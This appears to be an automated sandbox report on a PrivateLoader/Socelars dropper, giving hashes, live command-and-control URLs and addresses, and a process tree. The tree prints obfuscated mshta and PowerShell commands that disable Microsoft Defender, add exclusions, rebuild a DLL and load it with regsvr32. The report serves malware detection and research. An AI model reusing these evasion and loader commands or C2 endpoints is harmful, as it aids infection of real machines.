Analysis
-
max time kernel
136s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
05-11-2024 21:28
Static task
static1
Behavioral task
behavioral1
Sample
fd8d6820ebf0327175f81c0fe37385f6a6b7aa85721a3175f5f8790f8d78b74a.exe
Resource
win7-20240729-en
General
-
Target
fd8d6820ebf0327175f81c0fe37385f6a6b7aa85721a3175f5f8790f8d78b74a.exe
-
Size
4.8MB
-
MD5
6f934618840ba5e783ab399f01dd0682
-
SHA1
68887c655d3681ba9147a9f3b56f47acb96a742e
-
SHA256
fd8d6820ebf0327175f81c0fe37385f6a6b7aa85721a3175f5f8790f8d78b74a
-
SHA512
0e94b756a61e05787e5c0d081432bb90fdc7666e1775823e48c201ab3063bd00bfd6406dac88deecf24fbb7498106dbfbd0f713098c7e6c22a4941d4e332731c
-
SSDEEP
98304:xWCvLUBsgLEW8KLfyWpsZ9Z9boUB4vV07Xuj3WHARCV4gdFoL6qlNlIZLA+:xfLUCgLEWtwOUivVqXRaCagdi6qzlIZ9
Malware Config
Extracted
privateloader
http://45.133.1.107/server.txt
pastebin.com/raw/A7dSG1te
http://wfsdragon.ru/api/setStats.php
51.178.186.149
Extracted
socelars
http://www.hhgenice.top/
Signatures
-
Nullmixer family
-
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
Privateloader family
-
Socelars family
-
Socelars payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zSCF36CE87\Thu1397ed4f5c630155.exe family_socelars -
Processes:
powershell.exepowershell.exepid process 3196 powershell.exe 2384 powershell.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zSCF36CE87\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSCF36CE87\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSCF36CE87\libcurlpp.dll aspack_v212_v242 -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Thu13e2c43de4a.exemshta.exeT~j36rU9AV.ExEmshta.exemshta.exefd8d6820ebf0327175f81c0fe37385f6a6b7aa85721a3175f5f8790f8d78b74a.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation Thu13e2c43de4a.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation T~j36rU9AV.ExE Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation fd8d6820ebf0327175f81c0fe37385f6a6b7aa85721a3175f5f8790f8d78b74a.exe -
Executes dropped EXE 4 IoCs
Processes:
setup_install.exeThu13e2c43de4a.exeThu13e3899524.exeT~j36rU9AV.ExEpid process 5064 setup_install.exe 2312 Thu13e2c43de4a.exe 1832 Thu13e3899524.exe 1096 T~j36rU9AV.ExE -
Loads dropped DLL 7 IoCs
Processes:
setup_install.exeregsvr32.exepid process 5064 setup_install.exe 5064 setup_install.exe 5064 setup_install.exe 5064 setup_install.exe 5064 setup_install.exe 5064 setup_install.exe 3516 regsvr32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 33 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
mshta.exefd8d6820ebf0327175f81c0fe37385f6a6b7aa85721a3175f5f8790f8d78b74a.exepowershell.execmd.exemshta.execmd.execmd.execmd.execmd.execmd.execmd.exeregsvr32.exepowershell.exemshta.exeT~j36rU9AV.ExEcmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exetaskkill.execmd.execmd.execmd.execmd.execmd.exesetup_install.execmd.exeThu13e2c43de4a.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fd8d6820ebf0327175f81c0fe37385f6a6b7aa85721a3175f5f8790f8d78b74a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language T~j36rU9AV.ExE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup_install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Thu13e2c43de4a.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 3672 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 3196 powershell.exe 3196 powershell.exe 2384 powershell.exe 2384 powershell.exe 3196 powershell.exe 2384 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exeThu13e3899524.exepowershell.exetaskkill.exedescription pid process Token: SeDebugPrivilege 3196 powershell.exe Token: SeDebugPrivilege 1832 Thu13e3899524.exe Token: SeDebugPrivilege 2384 powershell.exe Token: SeDebugPrivilege 3672 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
fd8d6820ebf0327175f81c0fe37385f6a6b7aa85721a3175f5f8790f8d78b74a.exesetup_install.execmd.execmd.execmd.execmd.exedescription pid process target process PID 1020 wrote to memory of 5064 1020 fd8d6820ebf0327175f81c0fe37385f6a6b7aa85721a3175f5f8790f8d78b74a.exe setup_install.exe PID 1020 wrote to memory of 5064 1020 fd8d6820ebf0327175f81c0fe37385f6a6b7aa85721a3175f5f8790f8d78b74a.exe setup_install.exe PID 1020 wrote to memory of 5064 1020 fd8d6820ebf0327175f81c0fe37385f6a6b7aa85721a3175f5f8790f8d78b74a.exe setup_install.exe PID 5064 wrote to memory of 4108 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 4108 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 4108 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 2876 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 2876 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 2876 5064 setup_install.exe cmd.exe PID 2876 wrote to memory of 2384 2876 cmd.exe powershell.exe PID 2876 wrote to memory of 2384 2876 cmd.exe powershell.exe PID 2876 wrote to memory of 2384 2876 cmd.exe powershell.exe PID 4108 wrote to memory of 3196 4108 cmd.exe powershell.exe PID 4108 wrote to memory of 3196 4108 cmd.exe powershell.exe PID 4108 wrote to memory of 3196 4108 cmd.exe powershell.exe PID 5064 wrote to memory of 1280 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 1280 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 1280 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 3128 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 3128 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 3128 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 760 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 760 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 760 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 4908 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 4908 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 4908 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 4564 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 4564 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 4564 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 1976 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 1976 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 1976 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 4524 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 4524 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 4524 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 868 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 868 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 868 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 2296 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 2296 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 2296 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 2396 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 2396 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 2396 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 2496 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 2496 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 2496 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 676 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 676 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 676 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 3368 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 3368 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 3368 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 3880 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 3880 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 3880 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 4068 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 4068 5064 setup_install.exe cmd.exe PID 5064 wrote to memory of 4068 5064 setup_install.exe cmd.exe PID 760 wrote to memory of 2312 760 cmd.exe Thu13e2c43de4a.exe PID 760 wrote to memory of 2312 760 cmd.exe Thu13e2c43de4a.exe PID 760 wrote to memory of 2312 760 cmd.exe Thu13e2c43de4a.exe PID 3368 wrote to memory of 1832 3368 cmd.exe Thu13e3899524.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\fd8d6820ebf0327175f81c0fe37385f6a6b7aa85721a3175f5f8790f8d78b74a.exe"C:\Users\Admin\AppData\Local\Temp\fd8d6820ebf0327175f81c0fe37385f6a6b7aa85721a3175f5f8790f8d78b74a.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1020 -
C:\Users\Admin\AppData\Local\Temp\7zSCF36CE87\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSCF36CE87\setup_install.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5064 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4108 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3196
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2384
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu13a0a8e837.exe3⤵
- System Location Discovery: System Language Discovery
PID:1280
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu131277969aa75.exe3⤵
- System Location Discovery: System Language Discovery
PID:3128
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu13e2c43de4a.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:760 -
C:\Users\Admin\AppData\Local\Temp\7zSCF36CE87\Thu13e2c43de4a.exeThu13e2c43de4a.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2312 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCriPT: cLOsE( cREaTeoBject( "wscRIPT.ShelL" ).RuN ( "cmD.exe /R tyPE ""C:\Users\Admin\AppData\Local\Temp\7zSCF36CE87\Thu13e2c43de4a.exe"" >T~j36rU9AV.ExE && StArt T~J36rU9Av.EXe /pzcvbicSCGCxcXKVqVzVY7iLmoe6aKo & if """" == """" for %S in ( ""C:\Users\Admin\AppData\Local\Temp\7zSCF36CE87\Thu13e2c43de4a.exe"" ) do taskkill /f /IM ""%~nxS"" " , 0 ,tRUE) )5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:2976 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\7zSCF36CE87\Thu13e2c43de4a.exe" >T~j36rU9AV.ExE && StArt T~J36rU9Av.EXe /pzcvbicSCGCxcXKVqVzVY7iLmoe6aKo & if "" =="" for %S in ( "C:\Users\Admin\AppData\Local\Temp\7zSCF36CE87\Thu13e2c43de4a.exe" ) do taskkill /f /IM "%~nxS"6⤵
- System Location Discovery: System Language Discovery
PID:4968 -
C:\Users\Admin\AppData\Local\Temp\T~j36rU9AV.ExET~J36rU9Av.EXe /pzcvbicSCGCxcXKVqVzVY7iLmoe6aKo7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1096 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCriPT: cLOsE( cREaTeoBject( "wscRIPT.ShelL" ).RuN ( "cmD.exe /R tyPE ""C:\Users\Admin\AppData\Local\Temp\T~j36rU9AV.ExE"" >T~j36rU9AV.ExE && StArt T~J36rU9Av.EXe /pzcvbicSCGCxcXKVqVzVY7iLmoe6aKo & if ""/pzcvbicSCGCxcXKVqVzVY7iLmoe6aKo "" == """" for %S in ( ""C:\Users\Admin\AppData\Local\Temp\T~j36rU9AV.ExE"" ) do taskkill /f /IM ""%~nxS"" " , 0 ,tRUE) )8⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:1608 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\T~j36rU9AV.ExE" >T~j36rU9AV.ExE && StArt T~J36rU9Av.EXe /pzcvbicSCGCxcXKVqVzVY7iLmoe6aKo & if "/pzcvbicSCGCxcXKVqVzVY7iLmoe6aKo " =="" for %S in ( "C:\Users\Admin\AppData\Local\Temp\T~j36rU9AV.ExE" ) do taskkill /f /IM "%~nxS"9⤵
- System Location Discovery: System Language Discovery
PID:2992
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: cloSE ( cREAteoBJeCt ( "wScript.sheLl" ).RuN ( "C:\Windows\system32\cmd.exe /C ecHo | SET /P = ""MZ"" >SEIL3Ab1.71& cOPY /y /b SEIL3ab1.71 + WDUTT_.EV + N_AJB.J XLZDV.r & STart regsvr32.exe /u .\XLZdV.R /s & DEL WDUtt_.EV n_AJB.J SeIL3ab1.71 " ,0,tRue) )8⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:1836 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C ecHo | SET /P = "MZ" >SEIL3Ab1.71& cOPY /y /b SEIL3ab1.71+ WDUTT_.EV+ N_AJB.J XLZDV.r &STart regsvr32.exe /u .\XLZdV.R /s & DEL WDUtt_.EV n_AJB.J SeIL3ab1.719⤵
- System Location Discovery: System Language Discovery
PID:2032 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ecHo "10⤵
- System Location Discovery: System Language Discovery
PID:4524
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>SEIL3Ab1.71"10⤵
- System Location Discovery: System Language Discovery
PID:4692
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe /u .\XLZdV.R /s10⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3516
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /IM "Thu13e2c43de4a.exe"7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3672
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1309f95d88.exe3⤵
- System Location Discovery: System Language Discovery
PID:4908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu133260c4d0.exe3⤵
- System Location Discovery: System Language Discovery
PID:4564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu133780f889.exe /mixone3⤵
- System Location Discovery: System Language Discovery
PID:1976
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu134611b4fed.exe3⤵
- System Location Discovery: System Language Discovery
PID:4524
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1397ed4f5c630155.exe3⤵
- System Location Discovery: System Language Discovery
PID:868
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu134ce0f1a32b53a4.exe3⤵
- System Location Discovery: System Language Discovery
PID:2296
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu13681693c40c4.exe3⤵
- System Location Discovery: System Language Discovery
PID:2396
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1313825914297dc2.exe3⤵
- System Location Discovery: System Language Discovery
PID:2496
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu13cf8de0f5c64d.exe3⤵
- System Location Discovery: System Language Discovery
PID:676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu13e3899524.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3368 -
C:\Users\Admin\AppData\Local\Temp\7zSCF36CE87\Thu13e3899524.exeThu13e3899524.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1832
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu13498b96ca86.exe3⤵
- System Location Discovery: System Language Discovery
PID:3880
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1301f0da963761b5c.exe3⤵
- System Location Discovery: System Language Discovery
PID:4068
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
16KB
MD583509a43275c67f381f4269ab7ed4e0d
SHA19b761c948c24b1ae9e4248cf5f21b1cb755fcaf6
SHA2561cc636e4b470769e2ecad25652cac8bf6aa6c557b055a1ea68d94f26eb17a7de
SHA512ea31bb4d292a3283b7c61bd6e030f190d38073580ce91449dcdb0fbb8a06b24238a4aab89de6d1c7f5d4dfa710bb8d4ff2ac2b2e91dcb4aacf60bfed6c05cffa
-
Filesize
389KB
MD5b3297e6a01982c405b14ae61e4d08f50
SHA1857e4bca996e204bfa0b3713cd4ada71096edf0c
SHA256c37e330f97f7a2b2ec7c3ad76f1770dc75198b384dd6be64b6c5c8aa336c50da
SHA512f614ba048d184bce6818e0d97fafbb40d82e279aeb2322b79005007229fd1cf115a510c5d88f48429354ba396738fe7e08f25715afbe897de7333c305c8fdd1a
-
Filesize
379KB
MD532314bd21d6ff16a7cdf12a9ed15661e
SHA1bc808deb22df54c4878aba82692a738a82a9aa4b
SHA2563be78b4c7991d773efa9255ab9ea55a0772fb01edb55788cdbe824337f36bb33
SHA512f685421966fa1f09998a385c9a6e6898f984a546895008339aaea6e50b19c7ee079da50e5bbcc5bbb05c32259e138243c2c982d5a8201546908a79dedf577b03
-
Filesize
603KB
MD528eeacaf3af15051e7994176d7722951
SHA13a035ca7e3fe24dbabe44553e5bc1b80461c5230
SHA256703f6694bcb0eafd7396abda702f032c8f36db66c2e212499dd736c179b1749f
SHA5124b4435b5b7c2bea1139e70307b44f0aef760b8b30a70fb2e805ffb36e2d546b6b726cfe0d3f06fd4bfa93338752cd3d9a4b0f0434a2e325a08d13da570b4a37a
-
Filesize
159KB
MD50b1a68f8b891b82b83b795896eadb9ba
SHA1e3fa975566e52e51ba60b03c03169fcb59628b11
SHA2569ac3611f0a2f20c718e129bd4d39f6413cc2bffcd6c9b8bb801572535b006b85
SHA5127ecc636545b2baa5f418dded4a2cf6b0edf33ee522b806910599ea662b2d66d4c08ccf3ed2766679f77a5330f69984ad94bd1bb2183d8ee2261637526a982e8c
-
Filesize
141KB
MD554e899f8c68426a1e2f8a394ee2a4579
SHA13a70a36ebc8d508bd4f9ac2a7735b576057ba0a8
SHA256e4efc346f0f98ed5bad3e3a0efb805a1f34328b0b3d28a8d1e27c0231d6f7a46
SHA5125b020650c2b701a96b88344b38893612c031f524f52f4f84b39d30f69bb9a9ca5a2deb77a3d900561f76840d579d3f7336d41585b0b0b2f875b239fcbb2b584b
-
Filesize
362KB
MD5dcf289d0f7a31fc3e6913d6713e2adc0
SHA144be915c2c70a387453224af85f20b1e129ed0f0
SHA25606edeee5eaf02a2ee9849ca2b8bc9ec67c39c338c9b184c04f5f0da7c6bedfa5
SHA5127035e016476ce5bd670dc23cf83115bb82b65e58e858e07c843a3e77584a3c0119aaa688f73761ac3388b648ab9dbf88378aa0a6fe82e269b8e9bd347c37ebca
-
Filesize
900KB
MD5627921c5516546bf5e3c022bc732315d
SHA1c15421b4ebf2c992fd6698c44043f1d0c24d0f6e
SHA256d01e7379a9d2440076a17d88a848deedc1e9187f5697bc644de67cae2d08caf6
SHA51266e5a7eacb4b2d1ec9bcf6bd340cede116db39707efc7e6a7fb8ec93ba3abd2cc8fb023bd971b9da41b69d9469c0445bf821784466bbdd52d5e456d7cd9f4994
-
Filesize
748KB
MD5550dfc282a7f90bb87b21108fe29327e
SHA18bf22e0751de1700f5b0794679356754863aa108
SHA256b4ab4fb943a460764b2a04299d286279a23475a0cf91b01a5baaf31fae207b7c
SHA5125815a56477d61f461fb460ea5cfb720f7978e0d059a1e8f6d6ba953105334e69538b0670bde0da8ef42858f0d7b131c926591c23db5ef3952ed72c10602a96b9
-
Filesize
172KB
MD57c3cf9ce3ffb1e5dd48896fdc9080bab
SHA134b4976f8f83c1e0a9d277d2a103a61616178728
SHA256b3049882301853eed2aa8c5ac99010dd84292d7e092eb6f4311fa535716f5d83
SHA51252ec2ec50a2d4ca4f29e6b611176e37fee8693a7c34ec2197ec2ad250d525f607c3d4d70534520d1f5c16fd3f9231d261b00f8c3746d033eab1ed36cdde07473
-
Filesize
389KB
MD541bc15b01b6c29e0ea839f74ddbda5da
SHA1e76970642b293c14f2e02bb121860d5e6f696837
SHA2565deceb4891a9b458a261708d0b00501d3a7c170ab8b3143687c56a8208c9d986
SHA512dc5dbd488dd03923278c2ee77b397960d3f190c47edbee3b9dabbccb01d4671bb2b6393408824ba860bfa80c0e8eabd82562cdea564e4244dc46640050de3eb3
-
Filesize
1.4MB
MD5621c0400ec50b6ba95b3a60ef01461b9
SHA160c920a321cffe8b50763c50aa03de89362f4163
SHA2565714e2f0067cf7a946132efe0d64a621e01de74ef54f0bc713c948d89da236ea
SHA51219d8422606c794234daa7fc6ffe334de2a9e9167b945663d97fafebbef982b411a3ee05ab148da9b0542b238c034127183532e3caf7fadf456757a6135ae2ddd
-
Filesize
172KB
MD524766cc32519b05db878cf9108faeec4
SHA1c553780cb609ec91212bcdd25d25dde9c8ef5016
SHA256d7cdfb895940efd584c78b7e56f9ed720491234df489ee9eb9aa98c24714d530
SHA5125b911d6bbb119b04f24ff21bd720d9a7d6f02d49a4cd0f533f0dc0d48b107244f5a8f028982b566d2b999420b30d047908df0c20e29acdc57b63df20c785bec3
-
Filesize
76KB
MD5f01cb242bdcd28fa53da087bccd1a018
SHA11eda5797f315ae5351889524b4adaeb7ed062002
SHA2569279a95af173efac5d6b0058efad8789e1948451910f73ad2d163121e6c4d350
SHA5125e9a134d9ed6d105993c3d899a8521881f0db13094fa541a1fa7073a234434f8f22867aaf9987022335fea14961b9e5b33556f5ceeab77798e2481a6351f5025
-
Filesize
1.3MB
MD5e6cd887854237cbd378811ff56db58dc
SHA1f09ac49afe07cdb621fba121d77b90313e69c7d8
SHA2567026522ea22c419541d6b449c89b275d3e9e9b39f58a1f226d712c2325ee556b
SHA51292bef504f06d5b42d9f125d666edab5228642753e0bd925b2079b332c467c2e3287e2e4176b965c6741f5d4152a36d6f1f27933afa6472c2c71fb14a794f9c15
-
Filesize
8KB
MD5d753ad5b798676ec4bdc19da55f7333c
SHA1a6362aaa1b54239dea65704adb1f60a98bd310e3
SHA256ff434abe91e23a5ad36a9c1feb4d87db9f054e362ae5e21c6a992e5f5a518f2e
SHA512bb6c14eaa7a317bcfdf17b8701eeadb247db1bc37874b99fd926b347638260cab6ade3164a58d9ecac9f1e81c9a3029e0141196cbe68e7718ddddf045b60d45e
-
Filesize
218KB
MD5d09be1f47fd6b827c81a4812b4f7296f
SHA1028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA2560de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595
-
Filesize
54KB
MD5e6e578373c2e416289a8da55f1dc5e8e
SHA1b601a229b66ec3d19c2369b36216c6f6eb1c063e
